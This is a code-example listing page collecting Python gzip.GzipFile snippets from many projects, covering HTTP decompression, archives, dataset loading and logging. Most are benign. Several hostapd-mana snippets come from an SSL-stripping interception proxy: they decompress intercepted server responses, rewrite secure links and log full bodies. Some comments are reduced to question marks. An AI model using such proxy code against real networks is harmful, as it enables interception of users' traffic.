python类GzipFile()的实例源码

special.py 文件源码 项目:sublime-text-3-packages 作者: nickjj 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def get_tokens(self, text):
        """Yield ``(tokentype, value)`` pairs parsed from a raw token dump.

        Text input is first encoded to ASCII bytes.  When ``self.compress``
        is ``'gz'`` or ``'bz2'`` the bytes are decompressed with the matching
        codec before being handed to ``self.get_tokens_unprocessed``.
        """
        # the raw token stream never has any non-ASCII characters
        raw = text.encode('ascii') if isinstance(text, text_type) else text

        codec = self.compress
        if codec == 'gz':
            import gzip
            raw = gzip.GzipFile('', 'rb', 9, BytesIO(raw)).read()
        elif codec == 'bz2':
            import bz2
            raw = bz2.decompress(raw)

        # Lexer.get_tokens() is bypassed on purpose: no Unicode decoding may
        # happen here, and the newline normalisation below is mandatory.
        raw = raw.strip(b'\n') + b'\n'
        for _index, token_type, value in self.get_tokens_unprocessed(raw):
            yield token_type, value
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def encode_public_key(self):
        """
        Return the public key gzip-compressed and then base64-encoded
        (the representation used by spotnab).

        Returns None when writing the key raises TypeError, which the
        original author treats as "key not initialized yet".
        """
        buf = StringIO()
        with GzipFile(fileobj=buf, mode="wb") as gz:
            try:
                pem = self.public_pem()
                gz.write(pem)
            except TypeError:
                # It wasn't initialized yet
                return None

        compressed = buf.getvalue()
        return b64encode(compressed)
steamgifts.py 文件源码 项目:AutoSteamGifts 作者: joaopsys 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def getWebPage(url, headers, cookies, postData=None):
    """Fetch *url* and return the (gunzipped) response body.

    With *postData* the request is sent as a form-encoded POST through an
    opener that has an HTTPCookieProcessor; otherwise a plain GET is issued.
    *cookies* is sent verbatim as the ``Cookie`` header.  Any failure is
    printed and reported to the caller as ``None``.
    """
    try:
        if (postData):
            body = urllib.parse.urlencode(postData).encode('utf-8')
            request = urllib.request.Request(url, data=body, headers=headers)
            fetch = urllib.request.build_opener(urllib.request.HTTPCookieProcessor).open
        else:
            print('Fetching '+url)
            request = urllib.request.Request(url, None, headers)
            fetch = urllib.request.urlopen
        request.add_header('Cookie', cookies)
        response = fetch(request)

        if response.info().get('Content-Encoding') == 'gzip':
            compressed = BytesIO(response.read())
            return gzip.GzipFile(fileobj=compressed).read()
        return response.read()
    except Exception as e:
        print("Error processing webpage: "+str(e))
        return None

## https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-in-python-whilst-preserving-order
tarfile.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs):
        """Open gzip compressed tar archive name for reading or writing.
           Appending is not allowed.

           Raises ValueError for any mode other than 'r' or 'w',
           CompressionError when the gzip module is unusable, and ReadError
           when opening the archive fails with IOError.
        """
        if len(mode) > 1 or mode not in "rw":
            raise ValueError("mode must be 'r' or 'w'")

        try:
            import gzip
            gzip.GzipFile
        except (ImportError, AttributeError):
            raise CompressionError("gzip module is not available")

        gz = None
        try:
            gz = gzip.GzipFile(name, mode + "b", compresslevel, fileobj)
            t = cls.taropen(name, mode, gz, **kwargs)
        except IOError:
            # Do not leak the gzip wrapper (and any file it opened itself)
            # when the tar layer rejects the stream.
            if gz is not None:
                gz.close()
            raise ReadError("not a gzip file")
        t._extfileobj = False
        return t
xmlrpclib.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def gzip_encode(data):
    """data -> gzip encoded data

    Compress *data* with the gzip content encoding described in RFC 1952
    (compression level 1).  Raises NotImplementedError when the module-level
    ``gzip`` name is falsy.
    """
    if not gzip:
        raise NotImplementedError
    sink = StringIO.StringIO()
    compressor = gzip.GzipFile(mode="wb", fileobj=sink, compresslevel=1)
    compressor.write(data)
    # closing the GzipFile is what flushes the remaining output into the buffer
    compressor.close()
    payload = sink.getvalue()
    sink.close()
    return payload

##
# Decode a string using the gzip content encoding such as specified by the
# Content-Encoding: gzip
# in the HTTP header, as described in RFC 1952
#
# @param data The encoded data
# @return the unencoded data
# @raises ValueError if data is not correctly coded.
xmlrpclib.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def gzip_decode(data):
    """gzip encoded data -> unencoded data

    Decode data using the gzip content encoding as described in RFC 1952.

    Raises NotImplementedError when the module-level ``gzip`` name is falsy
    and ValueError when the payload cannot be read as gzip data.
    """
    if not gzip:
        raise NotImplementedError
    f = StringIO.StringIO(data)
    gzf = gzip.GzipFile(mode="rb", fileobj=f)
    try:
        decoded = gzf.read()
    except IOError:
        raise ValueError("invalid data")
    finally:
        # Release both streams on the failure path too, not only on success.
        gzf.close()
        f.close()
    return decoded

##
# Return a decoded file-like object for the gzip encoding
# as described in RFC 1952.
#
# @param response A stream supporting a read() method
# @return a file-like object that the decoded data can be read() from
client.py 文件源码 项目:plugin.video.exodus 作者: lastship 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _get_result(response, limit=None):
    if limit == '0':
        result = response.read(224 * 1024)
    elif limit:
        result = response.read(int(limit) * 1024)
    else:
        result = response.read(5242880)

    try:
        encoding = response.info().getheader('Content-Encoding')
    except:
        encoding = None
    if encoding == 'gzip':
        result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

    return result
convert.py 文件源码 项目:jx-sqlite 作者: mozilla 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def bytes2zip(bytes):
    """
    RETURN COMPRESSED BYTES

    A plain bytes value is gzipped in memory and returned as bytes.  An
    object with a ``read`` attribute is iterated, gzipped into a temporary
    file, and returned wrapped in a FileString.
    """
    if not hasattr(bytes, "read"):
        sink = BytesIO()
        gz = gzip.GzipFile(fileobj=sink, mode='w')
        gz.write(bytes)
        gz.close()
        return sink.getvalue()

    spool = TemporaryFile()
    gz = gzip.GzipFile(fileobj=spool, mode='w')
    for chunk in bytes:
        gz.write(chunk)
    gz.close()
    # rewind so the wrapper starts reading at the beginning of the archive
    spool.seek(0)
    from pyLibrary.env.big_data import FileString, safe_size
    return FileString(spool)
__init__.py 文件源码 项目:oscars2016 作者: 0x0ece 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
mnist.py 文件源码 项目:photinia 作者: XoriieInpottn 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def _extract_images(filename):
        """???????????????????

        :param filename: ?????
        :return: 4??numpy??[index, y, x, depth]? ???np.float32
        """
        images = []
        print('Extracting {}'.format(filename))
        with gzip.GzipFile(fileobj=open(filename, 'rb')) as f:
            buf = f.read()
            index = 0
            magic, num_images, rows, cols = struct.unpack_from('>IIII', buf, index)
            if magic != 2051:
                raise ValueError('Invalid magic number {} in MNIST image file: {}'.format(magic, filename))
            index += struct.calcsize('>IIII')
            for i in range(num_images):
                img = struct.unpack_from('>784B', buf, index)
                index += struct.calcsize('>784B')
                img = np.array(img, dtype=np.float32)
                # ????[0,255]???[0,1]
                img = np.multiply(img, 1.0 / 255.0)
                img = img.reshape(rows, cols, 1)
                images.append(img)
        return np.array(images, dtype=np.float32)
mnist.py 文件源码 项目:photinia 作者: XoriieInpottn 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _extract_labels(filename, num_classes=10):
        """???????????????

        :param filename: ?????
        :param num_classes: ??one-hot??????????10?
        :return: 2??numpy??[index, num_classes]? ???np.float32
        """
        labels = []
        print('Extracting {}'.format(filename))
        with gzip.GzipFile(fileobj=open(filename, 'rb')) as f:
            buf = f.read()
            index = 0
            magic, num_labels = struct.unpack_from('>II', buf, index)
            if magic != 2049:
                raise ValueError('Invalid magic number {} in MNIST label file: {}'.format(magic, filename))
            index += struct.calcsize('>II')
            for i in range(num_labels):
                label = struct.unpack_from('>B', buf, index)
                index += struct.calcsize('>B')
                label_one_hot = np.zeros(num_classes, dtype=np.float32)
                label_one_hot[label[0]] = 1
                labels.append(label_one_hot)
        return np.array(labels, dtype=np.float32)
__init__.py 文件源码 项目:sndlatr 作者: Schibum 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
sideshow.py 文件源码 项目:pyrsss 作者: butala 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def update_sideshow_file(fname,
                         server_fname,
                         server=SIDESHOW_SERVER,
                         temp_path=gettempdir()):
    """
    Update the JPL side show file stored locally at *fname*. The
    remote file is accessed via FTP on *server* at *server_fname*. The
    path *temp_path* is used to store intermediate files. Return
    *fname*.
    """
    dest_fname = replace_path(temp_path, server_fname)
    logger.info('opening connection to {}'.format(server))
    # retrbinary delivers raw bytes, so the download target must be opened
    # in binary mode.
    with closing(FTP(server)) as ftp, open(dest_fname, 'wb') as fid:
        logger.info('logging in')
        ftp.login()
        logger.info('writing to {}'.format(dest_fname))
        ftp.retrbinary('RETR ' + server_fname, fid.write)
    logger.info('uncompressing file to {}'.format(fname))
    # GzipFile.read() returns bytes as well; write them back unmodified.
    with GzipFile(dest_fname) as gzip_fid, open(fname, 'wb') as fid:
        fid.write(gzip_fid.read())
    return fname
usb_pdml.py 文件源码 项目:gps_track_pod 作者: iwanders 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def parse_file(self):
        """Parse the XML capture at ``self.path`` and pair up URB packets.

        Paths ending in "gz" are read through gzip.  Each child of the
        document root is wrapped in a USBPacket; a submit packet is
        remembered by its URB id, and when the completed packet with the
        same id arrives both are passed to ``self.usb_transaction``.
        """
        if self.path.endswith("gz"):
            f = gzip.GzipFile(self.path)
        else:
            f = open(self.path)
        try:
            tree = ET.parse(f)
        finally:
            # close the file even when the XML is malformed
            f.close()
        root = tree.getroot()
        current_urbs = {}
        for child in root:
            p = USBPacket(child)
            urb_id = p["usb.urb_id"]
            urb_status = p["usb.urb_status"]
            urb_type = p["usb.urb_type"]
            if (urb_type == URB_TYPE_SUBMIT):
                current_urbs[urb_id] = p
            if (urb_type == URB_TYPE_COMPLETED):
                if (urb_id not in current_urbs):
                    print("Urb id not present: {:x}".format(urb_id))
                else:
                    submit = current_urbs[urb_id]
                    completed = p
                    self.usb_transaction(submit, completed)
                    # the transaction is finished; forget the submit packet
                    del current_urbs[urb_id]
test_client.py 文件源码 项目:Tinychat-Bot--Discontinued 作者: Tinychat 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def setUp(self):
        """Prepare a gzip-compressed canned AMF3 response and the matching
        ``Content-Encoding`` header for the test case."""
        import gzip

        envelope = remoting.Envelope(pyamf.AMF3)
        envelope['/1'] = remoting.Response(['foo' * 50000] * 200)
        encoded = remoting.encode(envelope).getvalue()

        stream = util.BufferedByteStream()
        compressor = gzip.GzipFile(fileobj=stream, mode='wb')
        compressor.write(encoded)
        # closing finishes the gzip stream before the buffer is read back
        compressor.close()
        self.canned_response = stream.getvalue()

        BaseServiceTestCase.setUp(self)

        self.headers['Content-Encoding'] = 'gzip'
def _compress(path):
    """Gzip the file at *path* into a uniquely named ``.gz`` file and return
    the path of that archive.

    The original file is removed afterwards on a best-effort basis.
    """
    with open(path, "rb") as source:
        directory, filename = _split_compress_path(path)
        stem, extension = os.path.splitext(filename)

        with _unique_writable_file(directory, stem, extension + ".gz") as (gz_path, gz_file):
            gz_stream = gzip.GzipFile(fileobj=gz_file)
            try:
                gz_stream.writelines(source)
            finally:
                gz_stream.close()

    try:
        os.remove(path)
    except OSError:
        # failing to delete the uncompressed original is not fatal
        pass

    return gz_path
text.py 文件源码 项目:CodingDojo 作者: ComputerSocietyUNB 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def compress_sequence(sequence):
    """Lazily gzip the items of *sequence*.

    Yields whatever the buffer holds right after the GzipFile is created,
    then each non-empty piece of output produced while the items are
    written, and finally whatever is left after the stream is closed.
    """
    stream = StreamingBuffer()
    gz = GzipFile(mode='wb', compresslevel=6, fileobj=stream)
    # Output headers...
    yield stream.read()
    for chunk in sequence:
        gz.write(chunk)
        pending = stream.read()
        if pending:
            yield pending
    gz.close()
    yield stream.read()


# Expression to match some_token and some_token="with spaces" (and similarly
# for single-quoted strings).
Logger.py 文件源码 项目:mongodb_consistent_backup 作者: Percona-Lab 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def compress(self, current=False):
        """Gzip a log file to ``<name>.gz`` and delete the uncompressed file.

        With ``current=True`` the file at ``self.backup_log_file`` is
        compressed.  Otherwise ``self.last_log`` is compressed, unless it is
        not an existing file or is the same as ``self.backup_log_file``, in
        which case nothing happens.
        """
        compress_file = self.backup_log_file
        if not current:
            compress_file = self.last_log
            if not os.path.isfile(self.last_log) or self.last_log == self.backup_log_file:
                return
        logging.info("Compressing log file: %s" % compress_file)
        gz_file = "%s.gz" % compress_file
        gz_log = GzipFile(gz_file, "wb")
        try:
            # GzipFile only accepts bytes, so the source is read in binary.
            with open(compress_file, "rb") as f:
                for line in f:
                    gz_log.write(line)
        finally:
            gz_log.close()
        # Delete the original only after the archive has been completely
        # written and closed, so a failed close cannot lose the log.
        os.remove(compress_file)
common.py 文件源码 项目:malware 作者: JustF0rWork 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def retrieve_content(url, data=None):
    """
    Retrieves page content from given URL

    Spaces after the first '?' of *url* (or anywhere, when there is no '?')
    are escaped as %20.  A gzip or deflate encoded response is decompressed.
    On any failure the error body (if the exception is readable) or its
    ``msg`` attribute is returned instead; the result is never None.
    """

    try:
        # find() gives -1 when there is no '?', so split_at becomes 0 and the
        # whole URL is escaped, exactly like the per-character original.
        split_at = url.find('?') + 1
        quoted_url = url[:split_at] + url[split_at:].replace(' ', "%20")
        req = urllib2.Request(quoted_url, data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"})
        resp = urllib2.urlopen(req, timeout=TIMEOUT)
        retval = resp.read()
        encoding = resp.headers.get("Content-Encoding")

        if encoding:
            if encoding.lower() == "deflate":
                # -15: raw deflate stream without a zlib header
                stream = StringIO.StringIO(zlib.decompress(retval, -15))
            else:
                stream = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval))
            retval = stream.read()
    except Exception as ex:
        retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())

    return retval or ""
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        """Forward a server response body to the client.

        The body is gunzipped when ``self.isCompressed`` is set, logged at
        ``self.getLogLevel()``, passed through ``self.replaceSecureLinks``,
        and written to ``self.client``; the connection is then shut down.
        ``Content-Length`` is re-sent with the new body length only when a
        length was recorded in ``self.contentLength``.
        """
        if self.isCompressed:
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        # NOTE: this logs the complete body, which can be large.
        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if self.contentLength is not None:
            # the rewrite above may have changed the body size
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        """Forward a server response body to the client.

        The body is gunzipped when ``self.isCompressed`` is set, passed
        through ``self.replaceSecureLinks``, and written to ``self.client``;
        the connection is then shut down.  ``Content-Length`` is re-sent
        with the new body length only when a length was recorded in
        ``self.contentLength``.
        """
        if self.isCompressed:
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        # Only a placeholder is logged here, never the body itself.
        logging.log(self.getLogLevel(), "Read from server:\n <large data>" )

        data = self.replaceSecureLinks(data)

        if self.contentLength is not None:
            # the rewrite above may have changed the body size
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        """Forward a server response body to the client.

        The body is gunzipped when ``self.isCompressed`` is set, logged at
        ``self.getLogLevel()``, passed through ``self.replaceSecureLinks``,
        and written to ``self.client``; the connection is then shut down.
        ``Content-Length`` is re-sent with the new body length only when a
        length was recorded in ``self.contentLength``.
        """
        if self.isCompressed:
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        # NOTE: this logs the complete body, which can be large.
        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if self.contentLength is not None:
            # the rewrite above may have changed the body size
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
test_process.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def testProcess(self):
        """Pipe text through ``gzip -c`` in a spawned process and check that
        the collected output decompresses back to the input."""
        for candidate in ('/bin/gzip', '/usr/bin/gzip'):
            if os.path.exists(candidate):
                cmd = candidate
                break
        else:
            raise RuntimeError("gzip not found in /bin or /usr/bin")

        s = "there's no place like home!\n" * 3
        p = Accumulator()
        d = p.endedDeferred = defer.Deferred()
        reactor.spawnProcess(p, cmd, [cmd, "-c"], env=None, path="/tmp",
                             usePTY=self.usePTY)
        p.transport.write(s)
        p.transport.closeStdin()

        def processEnded(ign):
            # rewind the accumulated output before decompressing it
            collected = p.outF
            collected.seek(0, 0)
            unpacked = gzip.GzipFile(fileobj=collected).read()
            self.assertEquals(unpacked, s)
        return d.addCallback(processEnded)
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        """Forward a server response body to the client.

        The body is gunzipped when ``self.isCompressed`` is set, logged at
        ``self.getLogLevel()``, passed through ``self.replaceSecureLinks``,
        and written to ``self.client``; the connection is then shut down.
        ``Content-Length`` is re-sent with the new body length only when a
        length was recorded in ``self.contentLength``.
        """
        if self.isCompressed:
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        # NOTE: this logs the complete body, which can be large.
        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if self.contentLength is not None:
            # the rewrite above may have changed the body size
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
checkpoint.py 文件源码 项目:instagram_private_api 作者: ping 项目源码 文件源码 阅读 44 收藏 0 点赞 0 评论 0
def respond_to_checkpoint(self, response_code):
        """POST *response_code* (with the CSRF token) to ``self.endpoint``.

        Returns a ``(status_code, body)`` tuple, where the body is the
        UTF-8 decoded response, gunzipped first when the server sent it
        with ``Content-Encoding: gzip``.
        """
        req = Request(self.endpoint, headers={
            'User-Agent': self.USER_AGENT,
            'Origin': 'https://i.instagram.com',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip',
            'Referer': self.endpoint,
            'Cookie': self.cookie,
        })
        form = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code}
        payload = urlencode(form).encode('ascii')
        res = urlopen(req, data=payload, timeout=self.timeout)

        if res.info().get('Content-Encoding') == 'gzip':
            raw = gzip.GzipFile(fileobj=BytesIO(res.read())).read()
        else:
            raw = res.read()

        return res.code, raw.decode('utf-8')
dataload.py 文件源码 项目:mygene.info 作者: biothings 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def anyfile(infile, mode='r', encoding="utf8"):
    '''
    Return a file handle with support for gzip/zip compressed files.
    If infile is a two-value tuple, the first item is the compressed file
    and the second one is the actual filename inside the compressed file,
    e.g., ('a.zip', 'aa.txt').

    *mode* is only used for files that are neither .gz nor .zip.
    '''
    if isinstance(infile, tuple):
        infile, rawfile = infile[:2]
    else:
        rawfile = os.path.splitext(infile)[0]
    extension = os.path.splitext(infile)[1].lower()

    if extension == '.gz':
        import gzip
        return io.TextIOWrapper(gzip.GzipFile(infile, 'r'),encoding=encoding)
    if extension == '.zip':
        import zipfile
        member = zipfile.ZipFile(infile, 'r').open(rawfile, 'r')
        return io.TextIOWrapper(member, encoding=encoding)
    return open(infile, mode, encoding=encoding)
__init__.py 文件源码 项目:GAMADV-XTD 作者: taers232c 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
httpall.py 文件源码 项目:packet_analysis 作者: tanjiti 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def __parse_server_data(self):
        """
        Parse the buffered server-to-client data as an HTTP response.

        :return: the dpkt.http.Response built from ``self.data_s2c``, with a
            gzip body (checked by its first three bytes) replaced by the
            decompressed data; None when there is no data or parsing fails
        """
        if not self.data_s2c:
            return
        try:
            resp = dpkt.http.Response(self.data_s2c)
            if resp.headers.get("content-encoding") == "gzip":
                body = resp.body
                leading = mills.str2hex(body)[0:3]
                # 1f 8b 08: the gzip header bytes this parser expects
                if leading == ["1f", "8b", "08"]:
                    resp.body = gzip.GzipFile(fileobj=StringIO(body)).read()

            return resp
        except Exception as e:
            logging.error("[dpkt_http_resp_parse_failed]: %s %r" % (self.data_s2c, e))
sitemap_gen.py 文件源码 项目:pymotw3 作者: reingart 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def OpenFileForRead(path, logtext):
  """ Opens a text file, be it GZip or plain.

  Returns a (frame, file) pair.  For a '.gz' path, frame is the underlying
  binary file and file is the GzipFile reading from it; for any other path
  frame is None.  Both are None when path is empty, and an IOError is
  reported through output.Error instead of being raised.
  """
  raw_handle = None
  text_handle = None

  if not path:
    return (raw_handle, text_handle)

  try:
    if path.endswith('.gz'):
      raw_handle = open(path, 'rb')
      text_handle = gzip.GzipFile(fileobj=raw_handle, mode='rt')
    else:
      text_handle = open(path, 'rt')

    if logtext:
      message = 'Opened %s file: %s' % (logtext, path)
    else:
      message = 'Opened file: %s' % path
    output.Log(message, 1)
  except IOError:
    output.Error('Can not open file: %s' % path)

  return (raw_handle, text_handle)
#end def OpenFileForRead
__init__.py 文件源码 项目:httplib2 作者: httplib2 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content, -zlib.MAX_WBITS)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content


问题


面经


文章

微信
公众号

扫码关注公众号